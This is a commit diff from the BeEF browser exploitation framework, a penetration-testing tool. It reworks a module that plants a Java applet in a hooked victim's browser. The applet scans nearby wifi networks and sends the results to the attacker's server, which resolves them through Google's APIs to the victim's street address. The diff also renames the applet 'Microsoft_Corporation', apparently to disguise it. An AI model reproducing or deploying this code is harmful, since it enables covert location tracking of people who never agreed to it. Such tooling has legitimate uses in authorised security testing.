Changes to command module and get_physical location so that @datastore['cid'] , @datastore['results'] and @datastore['beefhook'] can be called from the modules

2012-03-05 03:40:46 +08:00
parent 698e01bb83
commit 95f7e92011
7 changed files with 38 additions and 76 deletions
--- a/core/main/command.rb
+++ b/core/main/command.rb
@@ -108,7 +108,7 @@ module BeEF
      # Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
      # @param [Hash] http_params HTTP parameters
      # @param [Hash] http_headers HTTP headers
-      def build_callback_datastore(http_params, http_headers)
+      def build_callback_datastore(http_params, http_headers, result, command_id, beefhook)
        @datastore = {'http_headers' => {}} # init the datastore

        # get, check and add the http_params to the datastore
@@ -126,6 +126,9 @@ module BeEF
          (print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
          @datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
        }
+        @datastore['results'] = result
+        @datastore['cid'] = command_id
+        @datastore['beefhook'] = beefhook		
      end

      # Returns the output of the command. These are the actual instructions sent to the browser.
--- a/core/main/handlers/commands.rb
+++ b/core/main/handlers/commands.rb
@@ -55,9 +55,11 @@ module Handlers
      beefhook = get_param(@data, 'beefhook')
      (print_error "BeEFhook is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)

+	  result = get_param(@data, 'results')
+
      # @note create the command module to handle the response
      command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))  
-      command.build_callback_datastore(@http_params, @http_header) 
+      command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook) 
      command.session_id = beefhook 
      if command.respond_to?(:post_execute)
        command.post_execute
--- a/modules/host/get_physical_location/command.js
+++ b/modules/host/get_physical_location/command.js
@@ -18,11 +18,11 @@ beef.execute(function() {
    var applet_id = '<%= @applet_id %>';
    var applet_name = '<%= @applet_name %>';
    var output;
-    beef.dom.attachApplet(applet_id, 'getGPSLocation', 'getGPSLocation' ,
+    beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'getGPSLocation' ,
       	null, applet_archive, null);
-    output = document.getGPSLocation.getInfo();
+    output = document.Microsoft_Corporation.getInfo();
    if (output) {
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output.replace(/\n/g,"<br>"));
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output);
    }
    beef.dom.detachApplet('getGPSLocation');
 });
--- a/modules/host/get_physical_location/getGPSLocation.class
+++ b/modules/host/get_physical_location/getGPSLocation.class
--- a/modules/host/get_physical_location/getGPSLocation.jar
+++ b/modules/host/get_physical_location/getGPSLocation.jar
--- a/modules/host/get_physical_location/getGPSLocation.java
+++ b/modules/host/get_physical_location/getGPSLocation.java
@@ -23,10 +23,8 @@ public class getGPSLocation extends Applet{

 	public void init() {
 		if (isWindows()) {
-			//System.out.println("This is Windows Machine");
 			result=getWindows();
 		} else if (isMac()) {
-			//System.out.println("This is Mac Machine");
 			result=getMac();
 		} else {
 			//System.out.println("Your OS is not support!!");
@@ -34,7 +32,6 @@ public class getGPSLocation extends Applet{
 	}
 	
 	public static String getWindows(){
-			String result = null;
            try {  
 			
 		ArrayList ssidList = new ArrayList();
@@ -76,7 +73,6 @@ public class getGPSLocation extends Applet{

 		int arraySize=ssidList.size();
 		if(arraySize==0){
-			//System.out.println("I don't know where the target is");
 			result="\nI don't know where the target is";
 		}
 		else{
@@ -89,9 +85,9 @@ public class getGPSLocation extends Applet{
 	}
 	
 	public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
+	    String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
 	    try {  
 			int j=0;
-			String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
 			while(j<ssidList.size()){
 				queryString+="&wifi=mac:";
 				queryString+=bssidList.get(j);
@@ -104,74 +100,14 @@ public class getGPSLocation extends Applet{
 				queryString+="ss:";
 				queryString+=rssiList.get(j);
 				j++;
-			}
-					
-			//Get geocoordinates / Longitude and Latitude
-			String geoCoordinates = null;		
-
-			URL url = new URL(queryString);
-			URLConnection urlc = url.openConnection();
-			urlc.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
-			BufferedReader reader = new BufferedReader(new InputStreamReader(urlc.getInputStream()));		
-			for (String output; (output = reader.readLine()) != null;) {
-				//System.out.println(output);
-				if(output.indexOf("18000.0")>0){
-					result+="\nLocation is not accurate\n";
-					//System.out.println("Location is not accurate\n");
-				}
-				else{	
-					if(output.indexOf("lat")>0){
-						output = output.replace("\"lat\" : ","");
-						output = output.replaceAll("^\\s+", "");
-						geoCoordinates = output;
-						result+="\nLatitude: ";
-						result+=output;
-						//System.out.println("Latitude: "+output);
-					}
-					if(output.indexOf("lng")>0){
-						output = output.replace("\"lng\" : ","");
-						output = output.replaceAll("^\\s+", "");
-						geoCoordinates += output;
-						result+="\nLongitude: ";
-						result+=output;
-						//System.out.println("Longitude: "+output);
-					}
-				}
-				
-			}
-			
-		
-			//Reverse geocoordinates to street address
-			String reverseGeo = "https://maps.googleapis.com/maps/geo?q="+geoCoordinates+"&output=json&sensor=true_or_false";
-			
-			//System.out.println(reverseGeo);
-
-				URL url1 = new URL(reverseGeo);
-				URLConnection urlc1 = url1.openConnection();
-				urlc1.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
-			BufferedReader reader1 = new BufferedReader(new InputStreamReader(urlc1.getInputStream()));		
-			for (String output1; (output1 = reader1.readLine()) != null;) {
-				if(output1.indexOf("address")>0){
-					output1 = output1.replace("\"address\": ",""); 
-					output1 = output1.replace("\",",""); 
-					output1 = output1.replace("\"",""); 
-					output1 = output1.replaceAll("^\\s+", "");
-					result+="\nAddress is ";
-					result+=output1;
-					//System.out.println("Address is "+output1);
-				}
 			}		
-			String mapAddress = "http://maps.google.com/maps?q="+geoCoordinates+"+%28You+are+located+here%29&iwloc=A&hl=en";
-			result+="\n"+mapAddress;
-			//System.out.println("\n"+mapAddress);
 		} catch (Exception e) { 
 			System.out.println(e.getMessage());
 		}
-		return result;		
+		return queryString;		
 	}
 	
 	public static String getMac(){
-		String result = null;	
        try {  
                Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");  
                BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));  
@@ -205,11 +141,9 @@ public class getGPSLocation extends Applet{
 			int arraySize=ssidList.size();
 			if(arraySize==0){
 				result="\nI don't know where the target is";
-				//System.out.println("I don't know where the target is");
 			}
 			else{
 				result=googleLookup(bssidList,ssidList,rssiList);
-
 			}
 		} catch (Exception e) { 
 			System.out.println(e.getMessage());
--- a/modules/host/get_physical_location/module.rb
+++ b/modules/host/get_physical_location/module.rb
@@ -13,14 +13,37 @@
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
+require 'rubygems'
+require 'json'
+require 'open-uri'
+
 class Get_physical_location < BeEF::Core::Command
+
  def pre_send
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
  end

-  def post_execute
-    save({'result' => @datastore['location_info']})
+  def post_execute        
+    results = @datastore['results'].to_s
+    results = results.gsub("location_info=","")
+
+    response = open(results).read
+    result = JSON.parse(response)
+    reverseGoogleUrl = "https://maps.googleapis.com/maps/geo?q="+result['location']['lat'].to_s+','+result['location']['lng'].to_s+"&output=json&sensor=true_or_false"
+    googleResults = open(reverseGoogleUrl).read
+    jsonGoogleResults = JSON.parse(googleResults)
+
+    addressFound = jsonGoogleResults['Placemark'][0]['address']
+
+    writeToResults = Hash.new
+    writeToResults['data'] = addressFound
+    BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults)
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getGPSLocation.jar')
+
+    content = {}
+    content['Result'] = addressFound
+    save content
  end
-  
+
 end